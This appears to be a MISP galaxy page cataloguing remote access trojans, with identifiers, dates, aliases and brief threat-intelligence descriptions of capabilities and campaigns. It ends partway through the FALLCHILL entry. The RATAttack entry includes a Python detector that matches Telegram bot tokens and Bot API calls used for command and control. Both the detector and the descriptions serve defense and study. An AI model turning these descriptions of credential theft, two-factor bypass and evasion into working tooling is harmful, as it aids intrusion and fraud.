UUID 4c053709-5349-4630-8462-dde28c8433eb which can be used as unique global reference for MegaTrojan in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2008

Venomous Ivy

Internal MISP references

UUID 9b5eb899-fc44-43f5-9a28-cdac4bc6a784 which can be used as unique global reference for Venomous Ivy in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2009

Xploit

Internal MISP references

UUID 286fc965-b019-49b1-937c-740b95a368bb which can be used as unique global reference for Xploit in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2010

Arctic R.A.T.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Arctic R.A.T.

Known Synonyms
Artic
Internal MISP references

UUID 3ff21b18-8be5-45fd-9d42-d5ab9dddfa4c which can be used as unique global reference for Arctic R.A.T. in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2010

GOlden Phoenix

Internal MISP references

UUID 422ff7d4-0106-4e87-8eae-8cbd6c789540 which can be used as unique global reference for GOlden Phoenix in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2010

GraphicBooting

Internal MISP references

UUID 06b18c56-0894-4bca-a373-21e1576ddd7c which can be used as unique global reference for GraphicBooting in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2010

Pocket RAT

Internal MISP references

UUID 76313bca-2551-4f0c-b427-e413cbb728b0 which can be used as unique global reference for Pocket RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2010

Erebus

Internal MISP references

UUID ee73e375-3ac2-4ce0-b24b-74fd82d52864 which can be used as unique global reference for Erebus in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2010
Related clusters

To see the related clusters, click here.

SharpEye

Internal MISP references

UUID c42394f8-5f35-4797-9393-8289ab8ad3ad which can be used as unique global reference for SharpEye in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2010

Archelaus Beta

Internal MISP references

UUID ccd38085-f3bc-4fb0-ae24-99a45964dd8e which can be used as unique global reference for Archelaus Beta in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2010

BlackHole

C# RAT (Remote Administration Tool) - Educational purposes only

Internal MISP references

UUID 2ea1f494-cf18-49fb-a043-36555131dd7c which can be used as unique global reference for BlackHole in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2011
Related clusters

To see the related clusters, click here.

Vanguard

Internal MISP references

UUID 9de3e8d7-c501-4926-a82f-6e147d66c06d which can be used as unique global reference for Vanguard in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2010

Ahtapod

Internal MISP references

UUID dd2c3283-095d-4895-85cd-6a01e0616968 which can be used as unique global reference for Ahtapod in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2011

FINSPY

Though we have not identified the targets, FINSPY is sold by Gamma Group to multiple nation-state clients, and we assess with moderate confidence that it was being used along with the zero-day to carry out cyber espionage.

Internal MISP references

UUID 6ac125c8-6f00-490f-a43b-30b36d715431 which can be used as unique global reference for FINSPY in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2012
Related clusters

To see the related clusters, click here.

Seed RAT

Seed is a firewall-bypassing trojan that injects into the default browser and has a simple purpose: to be compact (4kb server size) and useful while uploading bigger, full-featured trojans, or even to have Seed download them from somewhere. It has computer info, a process manager, and a file manager with download, create folder, delete, execute and upload, plus a remote download function. Everything comes with an easy-to-use interface that resembles an instant messenger.

Internal MISP references

UUID 4c0ec00c-7fd4-4d8b-b1c9-6a12035fe992 which can be used as unique global reference for Seed RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2004 or 2011

SharpBot

Internal MISP references

UUID 126d167b-c47e-42a5-91fa-5af157f6df30 which can be used as unique global reference for SharpBot in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2011

TorCT PHP RAT

Internal MISP references

UUID 14210ee4-e0bf-49f9-8d7a-13180dadda6b which can be used as unique global reference for TorCT PHP RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2012

A32s RAT

Internal MISP references

UUID 564dc473-e3a7-466b-afa0-591db218c05e which can be used as unique global reference for A32s RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2012

Char0n

Internal MISP references

UUID 6faf9e5a-517f-4f7c-b720-7b7d537f65ef which can be used as unique global reference for Char0n in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2012

Nytro

Internal MISP references

UUID 25d23e76-72b1-4d47-9c80-9610a91e4945 which can be used as unique global reference for Nytro in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2012

Syla

Internal MISP references

UUID bcbe2297-5ebf-48fe-936c-6f850f23383c which can be used as unique global reference for Syla in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2012

Cobalt Strike

Cobalt Strike is software for Adversary Simulations and Red Team Operations.

Internal MISP references

UUID ca44dd5e-fd9e-48b5-99cb-0b2629b9265f which can be used as unique global reference for Cobalt Strike in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2012
Related clusters

To see the related clusters, click here.

Sakula

The RAT, which according to compile timestamps first surfaced in November 2012, has been used in targeted intrusions through 2015. Sakula enables an adversary to run interactive commands as well as to download and execute additional components.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sakula.

Known Synonyms
Sakurel
VIPER
Internal MISP references

UUID 3eca2d5f-41bf-4ad4-847f-df18befcdc44 which can be used as unique global reference for Sakula in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2012
Related clusters

To see the related clusters, click here.

hcdLoader

hcdLoader is a remote access tool (RAT) that has been used by APT18.

Internal MISP references

UUID 12bb8f4f-af29-49a0-8c2c-d28468f28fd8 which can be used as unique global reference for hcdLoader in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2012
Related clusters

To see the related clusters, click here.

Crimson

Internal MISP references

UUID 8d8efbc6-d1b7-4ec8-bab3-591edba337d0 which can be used as unique global reference for Crimson in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2012
Related clusters

To see the related clusters, click here.

KjW0rm

Internal MISP references

UUID a7bffc6a-5b47-410b-b039-def16050adcb which can be used as unique global reference for KjW0rm in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2013
Related clusters

To see the related clusters, click here.

Ghost

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ghost.

Known Synonyms
Ucul
Internal MISP references

UUID 22f43398-47b2-4851-866a-b9ed0d355bf2 which can be used as unique global reference for Ghost in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2013

9002

Internal MISP references

UUID 21029a2d-85d7-40d0-9b87-8e8c414bf470 which can be used as unique global reference for 9002 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2013

Sandro RAT

Internal MISP references

UUID ad630149-e7d4-4ca0-9877-ef37743d00a3 which can be used as unique global reference for Sandro RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2014

Mega

Internal MISP references

UUID d0d7dc33-1c12-4a5a-b421-79f4761bd1b1 which can be used as unique global reference for Mega in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2014

WiRAT

Internal MISP references

UUID af66d0c1-15c9-4a0b-b0cc-4208914707e6 which can be used as unique global reference for WiRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2014

3PARA RAT

Internal MISP references

UUID 59fb0222-0e7d-4f5f-92ac-e68012fb927d which can be used as unique global reference for 3PARA RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

To see the related clusters, click here.

BBS RAT

Internal MISP references

UUID 6e754ac7-0ffb-4510-9f70-4b74ab7bc868 which can be used as unique global reference for BBS RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2014

Konni

KONNI is a remote access Trojan (RAT) that was first reported in May of 2017, but is believed to have been in use for over 3 years. As part of our daily threat monitoring, FortiGuard Labs came across a new variant of the KONNI RAT and decided to take a deeper look.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Konni.

Known Synonyms
KONNI
Internal MISP references

UUID 5b930a23-7d88-481f-8791-abc7b3dd93d2 which can be used as unique global reference for Konni in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

To see the related clusters, click here.

Felismus RAT

Used by Sowbug

Internal MISP references

UUID 1a35d040-1e0e-402b-8174-43e5c3c81922 which can be used as unique global reference for Felismus RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2014

Xsser

Xsser mRAT is a piece of malware that targets iOS devices that have software limitations removed. The app is installed via a rogue repository on Cydia, the most popular third-party application store for jailbroken iPhones. Once the malicious bundle has been installed and executed, it gains persistence - preventing the user from deleting it. The mRAT then makes server-side checks and proceeds to steal data from the user's device and executes remote commands as directed by its command-and-control (C2) server.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Xsser.

Known Synonyms
mRAT
Internal MISP references

UUID b1abae3d-e1a1-4c50-a3b0-9509c594a600 which can be used as unique global reference for Xsser in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2014

GovRAT

GovRAT is an old cyberespionage tool; it has been in the wild since 2014 and has been used by various threat actors over the years.

Internal MISP references

UUID b6ddc2c6-5890-4c60-9b10-4274d1a9cc22 which can be used as unique global reference for GovRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2015
Related clusters

To see the related clusters, click here.

Rottie3

Internal MISP references

UUID 2e44066e-bb4f-41f9-86d3-495f83df5195 which can be used as unique global reference for Rottie3 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2015

Killer RAT

Internal MISP references

UUID 983d5ac0-2e26-4793-8bab-fce33ae4e46d which can be used as unique global reference for Killer RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2015

Hi-Zor

Internal MISP references

UUID d22a3e65-75e5-4970-b424-bdc06ec33dba which can be used as unique global reference for Hi-Zor in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2015
Related clusters

To see the related clusters, click here.

Quaverse

Quaverse RAT or QRAT is a fairly new Remote Access Tool (RAT) introduced in May 2015. This RAT is marketed as an undetectable Java RAT. As you might expect from a RAT, the tool is capable of grabbing passwords, key logging and browsing files on the victim's computer. On a regular basis for the past several months, we have observed the inclusion of QRAT in a number of spam campaigns.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Quaverse.

Known Synonyms
QRAT
Internal MISP references

UUID 3d7cbe3f-ba90-46f7-89a2-21aa52871404 which can be used as unique global reference for Quaverse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2015

Heseber

Internal MISP references

UUID 69d1f7e0-d7df-4e86-bec5-b7df696c5bcf which can be used as unique global reference for Heseber in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2015

Cardinal

Cardinal is a remote access trojan (RAT) discovered by Palo Alto Networks in 2017 and has been active for over two years. It is delivered via a downloader, known as Carp, and uses malicious macros in Microsoft Excel documents to compile embedded C# programming language source code into an executable that runs and deploys the Cardinal RAT. The malicious Excel files use different tactics to get the victims to execute them.

Internal MISP references

UUID cb23f563-a8b9-4427-9884-594e8d3cc836 which can be used as unique global reference for Cardinal in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2015
Related clusters

To see the related clusters, click here.

OmniRAT

Works on all Android, Windows, Linux and Mac devices!

Internal MISP references

UUID f091dfcb-07f4-4414-849e-c644e7327d94 which can be used as unique global reference for OmniRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2015
Related clusters

To see the related clusters, click here.

Jfect

Internal MISP references

UUID 10193e70-8bb7-4e48-b8f0-7692f2052c89 which can be used as unique global reference for Jfect in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2015

Trochilus

Trochilus is a remote access trojan (RAT) first identified in October 2015 when attackers used it to infect visitors of a Myanmar website. It was then used in a 2016 cyber-espionage campaign, dubbed "the Seven Pointed Dagger," managed by another group, "Group 27," who also uses the PlugX trojan. Trochilus is primarily spread via emails with a malicious .RAR attachment containing the malware. The trojan's functionality includes a shellcode extension, remote uninstall, a file manager, and the ability to download and execute, upload and execute, and access the system information. Once present on a system, Trochilus can move laterally in the network for better access. This trojan operates in memory only and does not write to the disk, helping it evade detection.

Internal MISP references

UUID 8204723f-aefc-4c90-9178-8fe53e8d6f33 which can be used as unique global reference for Trochilus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2015
Related clusters

To see the related clusters, click here.

Matryoshka

Their most commonly used initial attack vector is a simple, yet alarmingly effective, spearphishing attack, infecting unsuspecting victims via a malicious email attachment (usually an executable that has been disguised as something else). From there, Matryoshka runs second stage malware via a dropper and covertly installs a Remote Access Toolkit (RAT). This is done using a reflective loader technique that allows the malware to run in process memory, rather than being written to disk. This not only hides the install of the RAT but also ensures that the RAT will be ‘reinstalled’ after system restart.

Internal MISP references

UUID 33b86249-5455-4698-a5e5-0c9591e673b9 which can be used as unique global reference for Matryoshka in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2015
Related clusters

To see the related clusters, click here.

Mangit

First discovered by Trend Micro in June, Mangit is a new malware family being marketed on both the Dark web and open internet. Users have the option to rent the trojan's infrastructure for about $600 per 10-day period or buy the source code for about $8,800. Mangit was allegedly developed by "Ric", a Brazilian hacker, who makes himself available via Skype to discuss rental agreements. Once the malware is rented or purchased, the user controls a portion of the Mangit botnet, the trojan, the dropper, an auto-update system, and the server infrastructure to run their attacks. Mangit contains support for nine Brazilian banks including Citibank, HSBC, and Santander. The malware can also be used to steal user PayPal credentials. Mangit has the capability to collect banking credentials, receive SMS texts when a victim is accessing their bank account, and take over victims' browsers. To circumvent two-factor authentication, attackers can use Mangit to lock victims' browsers and push pop-ups to the victim asking for the verification code they just received.

Internal MISP references

UUID 05ecfb96-f9ec-4dab-b7d3-86b8cb3fe7b5 which can be used as unique global reference for Mangit in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016

LeGeNd

Internal MISP references

UUID 20336460-828e-4f18-bbe6-14f3579b5f5a which can be used as unique global reference for LeGeNd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016

Revenge-RAT

Revenge v0.1 was a simple tool, according to a researcher known as Rui, who says the malware's author didn't bother obfuscating the RAT's source code. This raised a question mark with the researchers, who couldn't explain why VirusTotal scanners couldn't pick it up as a threat right away. Revenge, which was written in Visual Basic, also didn't offer many working features compared to similar RATs. Even Napolean admitted that his tool was still in the early development stages, a reason why he provided the RAT for free.

Internal MISP references

UUID 80c94c22-b294-4622-8934-e89a235d586f which can be used as unique global reference for Revenge-RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016

vjw0rm 0.1

“Vengeance Justice Worm” was first discovered in 2016 and is a highly multifunctional, modular, publicly available “commodity malware”, i.e., it can be purchased by those interested through various cybercrime and hacking related forums and channels.

VJwOrm is a JavaScript-based malware and combines characteristics of Worm, Information Stealer, Remote-Access Trojan (RAT), Denial-of-Service (DOS) malware, and spam-bot.

VJw0rm is propagated primarily by malicious email attachments and by infecting removable storage devices.

Once executed by the victim, the very heavily obfuscated VJw0rm will enumerate installed drives and, if a removable drive is found, VJwOrm will infect it if configured to do so.

It will continue to gather victim information such as operating system details, user’s details, installed anti-virus product details, stored browser cookies, the presence of vbc.exe on the system (Microsoft’s .NET Visual Basic Compiler, this indicates that .NET is installed on the system and can affect the actor’s choice of additional malware delivery), and whether the system has been previously infected.

VJw0rm will then report this information back to its command-and-control server and await further commands, such as downloading and executing additional malware or employing any of its other numerous capabilities.

Finally, VJw0rm establishes persistence in the form of registry auto-runs, system startup folders, a scheduled task, or any combination of these methods.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular vjw0rm 0.1.

Known Synonyms
VJw0rm
VJwOrm
Vengeance Justice Worm
Internal MISP references

UUID bf86d7a6-80af-4d22-a092-f822bf7201d2 which can be used as unique global reference for vjw0rm 0.1 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016

rokrat

ROKRAT is a remote access trojan (RAT) that leverages a malicious Hangul Word Processor (HWP) document sent in spearphishing emails to infect hosts. The HWP document contains an embedded Encapsulated PostScript (EPS) object. The object exploits an EPS buffer overflow vulnerability and downloads a binary disguised as a .JPG file. The file is then decoded and the ROKRAT executable is initiated. The trojan uses legitimate Twitter, Yandex, and Mediafire websites for its command and control communications and exfiltration platforms, making them difficult to block globally. Additionally, the platforms use HTTPS connections, making it more difficult to gather additional data on its activities. Cisco's Talos Group identified two email campaigns. In one, attackers send potential victims emails from an email server of a private university in Seoul, South Korea with a sender email address of "kgf2016@yonsei.ac.kr," the contact email for the Korea Global Forum, adding a sense of legitimacy to the email. It is likely that the email address was compromised and used by the attackers in this campaign. The second is less sophisticated and sends emails claiming to be from a free Korean mail service with the subject line "Request Help" and an attached malicious HWP file named "I'm a munchon person in Gangwon-do, North Korea." The ROKRAT developer uses several techniques to hinder analysis, including identifying tools usually used by malware analysts or within sandbox environments. Once it has infected a device, this trojan can execute commands, move a file, remove a file, kill a process, download and execute a file, upload documents, capture screenshots, and log keystrokes. Researchers believe the developer is a native Korean speaker and the campaign is currently targeting Korean speakers.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular rokrat.

Known Synonyms
ROKRAT
Internal MISP references

UUID 38e68703-1db4-4b97-80e9-a0afd099da58 which can be used as unique global reference for rokrat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016

Qarallax

Travelers applying for a US Visa in Switzerland were recently targeted by cyber-criminals linked to a malware called QRAT. Twitter user @hkashfi posted a Tweet saying that one of his friends received a file (US Travel Docs Information.jar) from someone posing as USTRAVELDOCS.COM support personnel using the Skype account ustravelidocs-switzerland (notice the “i” between “travel” and “docs”).

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Qarallax.

Known Synonyms
qrat
Internal MISP references

UUID 179288c9-4ff1-4a7e-b728-35dd2e6aac43 which can be used as unique global reference for Qarallax in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016
Related clusters

To see the related clusters, click here.

MoonWind

MoonWind is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand.

Internal MISP references

UUID f266754c-d0aa-4918-95a3-73b28eaa66e3 which can be used as unique global reference for MoonWind in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016
Related clusters

To see the related clusters, click here.

Remcos

Remcos is another RAT (Remote Administration Tool) that was first discovered being sold in hacking forums in the second half of 2016. Since then, it has been updated with more features, and just recently, we’ve seen its payload being distributed in the wild for the first time.

Internal MISP references

UUID f647cca0-7416-47e9-8342-94b84dd436cc which can be used as unique global reference for Remcos in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016
Related clusters

To see the related clusters, click here.

Client Maximus

The purpose of the Client Maximus malware is financial fraud. As such, its code aspires to create the capabilities that most banking Trojans have, which allow attackers to monitor victims' web navigation and interrupt online banking sessions at will. After taking over a victim's banking session, an attacker operating this malware can initiate a fraudulent transaction from the account and use social engineering screens to manipulate the unwitting victim into authorizing it.

Internal MISP references

UUID d840e5af-3e6b-49af-ab82-fb4f8740bf55 which can be used as unique global reference for Client Maximus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016
Related clusters

To see the related clusters, click here.

TheFat RAT

TheFatRat, a massive exploiting tool revealed: an easy tool to generate backdoors and an easy tool for post-exploitation attacks like browser attacks and DLL attacks. This tool compiles malware with a popular payload, and the compiled malware can then be executed on Windows, Android and Mac. The malware created with this tool also has an ability to bypass most…

Internal MISP references

UUID 90b4addc-e9ff-412d-899e-7204c89c0bdb which can be used as unique global reference for TheFat RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016

RedLeaves

Since around October 2016, JPCERT/CC has been confirming information leakage and other damages caused by malware ‘RedLeaves’. It is a new type of malware which has been observed since 2016 in attachments to targeted emails.

Internal MISP references

UUID ad6a1b4a-6d79-40d4-adb7-1d7ca697347e which can be used as unique global reference for RedLeaves in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016
Related clusters

Rurktar

Dubbed Rurktar, the tool hasn’t had all of its functionality implemented yet, but G DATA says “it is relatively safe to say [it] is intended for use in targeted spying operations.” The malicious program could be used for reconnaissance operations, as well as to spy on infected computers users, and steal or upload files.

Internal MISP references

UUID 40bce827-4049-46e4-8323-3ab58f0f00bc which can be used as unique global reference for Rurktar in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017
Related clusters

RATAttack

RATAttack is a remote access trojan (RAT) that uses the Telegram protocol to support encrypted communication between the victim's machine and the attacker. The Telegram protocol also provides a simple method to communicate to the target, negating the need for port forwarding. Before using RATAttack, the attacker must create a Telegram bot and embed the bot's Telegram token into the trojan's configuration file. When a system is infected with RATAttack, it connects to the bot's Telegram channel. The attacker can then connect to the same channel and manage the RATAttack clients on the infected host machines. The trojan's code was available on GitHub then was taken down by the author on April 19, 2017.
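
Because the operator has to embed a Telegram bot token in the trojan's configuration, that token is a concrete artifact to hunt for in configs, memory dumps and unpacked binaries. The following is an added example, not RATAttack's code: it scans a byte blob for strings shaped like a Telegram bot token and for the Bot API endpoint prefix, and combines the two into a coarse verdict. The 8-10 digit bot-id length and the sample config are assumptions and constructed data, not values taken from a real sample.

```python
import re

# Telegram bot tokens look like "<numeric bot id>:<35-character secret>".
# The 8-10 digit id length is an assumption drawn from commonly seen tokens,
# not a documented Telegram guarantee; widen it if you get misses.
TOKEN_RE = re.compile(rb"(?<![0-9A-Za-z])([0-9]{8,10}):([A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])")
# Every Bot API call goes to this path prefix, whatever the token.
API_RE = re.compile(rb"api\.telegram\.org/bot", re.IGNORECASE)


def find_bot_tokens(blob: bytes) -> list:
    """Return candidate bot tokens in a byte blob (config file, memory dump, unpacked binary)."""
    hits = []
    for m in TOKEN_RE.finditer(blob):
        bot_id, secret = m.group(1).decode(), m.group(2).decode()
        hits.append({
            "offset": m.start(),
            "bot_id": bot_id,
            # Redact the secret: a report containing a live token hands the bot to whoever reads it.
            "token_redacted": f"{bot_id}:{secret[:4]}...",
        })
    return hits


def references_bot_api(blob: bytes) -> bool:
    """True if the blob contains the Bot API endpoint prefix."""
    return API_RE.search(blob) is not None


def triage(blob: bytes) -> dict:
    """Combine both indicators into a coarse verdict for a single artifact."""
    tokens = find_bot_tokens(blob)
    uses_api = references_bot_api(blob)
    if tokens and uses_api:
        verdict = "likely telegram-c2"
    elif tokens or uses_api:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "tokens": tokens, "uses_api": uses_api}


# Constructed sample: what a plaintext RAT config embedding a bot token might look like.
SAMPLE_CONFIG = (
    b"[settings]\r\n"
    b"token=123456789:AAHabcdefghijklmnopqrstuvwxyz012345\r\n"
    b"api=https://api.telegram.org/bot%s/getUpdates\r\n"
)

if __name__ == "__main__":
    print(triage(SAMPLE_CONFIG))
```

This only finds plaintext tokens; a build that XORs or base64-encodes its configuration has to be unpacked, or dumped from memory, first. A hit is an indicator rather than a verdict, since legitimate software also talks to Telegram bots, so pair it with the network side: outbound TLS to api.telegram.org from a process that is not a messaging client.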

Internal MISP references

UUID 2384b62d-312f-43e2-ab47-68c9fcca1541 which can be used as unique global reference for RATAttack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017

KhRAT

So called because the command and control (C2) infrastructure of previous variants of the malware was located in Cambodia, as discussed by Roland Dela Paz at Forcepoint, KHRAT is a Trojan that registers victims using their infected machine's username, system language and local IP address. KHRAT provides the threat actors with typical RAT features and access to the victim system, including keylogging, screenshot capture, remote shell access and so on.

Internal MISP references

UUID 9da7b7b2-f514-4114-83c0-ce3a5f635d2e which can be used as unique global reference for KhRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017

RevCode

Internal MISP references

UUID 5a3463d3-ff2a-41e2-9186-55da8c88b349 which can be used as unique global reference for RevCode in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017

AhNyth Android

Android Remote Administration Tool

Internal MISP references

UUID b1df2bb1-7fd4-4a25-93c3-fe1f2c7cf529 which can be used as unique global reference for AhNyth Android in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017

Socket23

SOCKET23 was launched from its author's web site and immediately infected major French corporations between August and October 1998. The virus distributing the Trojan was known as W32/HLLP.DeTroie.A (alias W32/Cheval.TCV). Never had a virus so disrupted French industry. The author quickly offered his own remover and made his apologies on his web site (since taken down). Jean-Christophe X (18) was arrested on Tuesday 15 June 1999 in the Paris area and placed under judicial investigation for 'fraudulent intrusion of data in a data processing system, suppression and fraudulent modification of data'.

Internal MISP references

UUID da7c818f-5f3b-415c-b885-cf0a71d6e89e which can be used as unique global reference for Socket23 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 1998

PowerRAT

Internal MISP references

UUID b3620451-8871-4078-bbf9-aa5bab641299 which can be used as unique global reference for PowerRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2017

MacSpy

Standard macOS backdoor, offered via a 'malware-as-a-service' model. MacSpy is advertised as the "most sophisticated Mac spyware ever", with the low starting price of free. While malware-as-a-service (MaaS) is not a new idea, with players such as Tox and Shark already in the game, MacSpy is one of the first seen for the OS X platform.

Internal MISP references

UUID b7cea5fe-d3fe-47cf-ba82-104c90e130ff which can be used as unique global reference for MacSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017
Related clusters

DNSMessenger

Talos recently analyzed an interesting malware sample that uses DNS TXT record queries and responses to create a bidirectional command and control (C2) channel. This allows the attacker to use DNS traffic to submit new commands to be run on infected machines and to return the results of the command execution. This is an extremely uncommon and evasive way of administering a RAT. The use of multiple stages of PowerShell, several of them completely fileless, indicates an attacker who has taken significant measures to avoid detection.

Internal MISP references

UUID ee8ccb36-2596-43a3-a044-b8721dbeb2ab which can be used as unique global reference for DNSMessenger in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017
Related clusters

PentagonRAT

Internal MISP references

UUID d208daa3-6ecd-4faf-8492-04f7b5b2dd28 which can be used as unique global reference for PentagonRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017

NewCore

NewCore is a remote access trojan first discovered by Fortinet researchers while conducting analysis on a China-linked APT campaign targeting Vietnamese organizations. The trojan is a DLL file, executed after a trojan downloader is installed on the targeted machine. Based on strings in the code, the trojan may be compiled from the publicly-available source code of the PcClient and PcCortr backdoor trojans.

Internal MISP references

UUID 6a505bfc-87fe-4bd2-97d7-394a3c29611d which can be used as unique global reference for NewCore in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017

Deeper RAT

Internal MISP references

UUID d7739c15-07af-4cfd-9eea-a28ed90cbfa5 which can be used as unique global reference for Deeper RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2010

Xyligan

Internal MISP references

UUID 0a75f34a-eaca-4ed8-b2f2-3f713c7a0693 which can be used as unique global reference for Xyligan in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2012

H-w0rm

Internal MISP references

UUID ca6e2e9b-6b5a-447b-9561-295c807a6484 which can be used as unique global reference for H-w0rm in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2013

htpRAT

On November 8, 2016 a non-disclosed entity in Laos was spear-phished by a group closely related to known Chinese adversaries and most likely affiliated with the Chinese government. The attackers used a new kind of Remote Access Trojan (RAT) that had not been previously observed or reported. The new RAT extends the capabilities of traditional RATs by providing complete remote execution of custom commands and programming. htpRAT, uncovered by RiskIQ cyber investigators, is the newest weapon in the Chinese adversary's arsenal in a campaign against the Association of Southeast Asian Nations (ASEAN). Most RATs can log keystrokes, take screenshots, record audio and video from a webcam or microphone, install and uninstall programs and manage files. They support a fixed set of commands that operators execute using different command IDs ('file download' or 'file upload', for example) and must be completely rebuilt to gain different functionality. htpRAT, on the other hand, serves as a conduit through which operators do their job with greater precision and effect. On the command and control (C2) server side, threat actors can build new functionality into commands, which are sent to the malware to execute. This capability makes htpRAT a small, agile and incredibly dynamic piece of malware. Operators can change functionality, such as searching for a different file on the victim's network, simply by wrapping commands.

Internal MISP references

UUID 7362581a-a7d1-4060-b225-e227f2df2b60 which can be used as unique global reference for htpRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

FALLCHILL

According to trusted third-party reporting, HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace, telecommunications, and finance industries. The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control (C2) server to a victim’s system via dual proxies. FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors. HIDDEN COBRA actors use an external tool or dropper to install the FALLCHILL malware-as-a-service to establish persistence. Because of this, additional HIDDEN COBRA malware may be present on systems compromised with FALLCHILL.

Internal MISP references

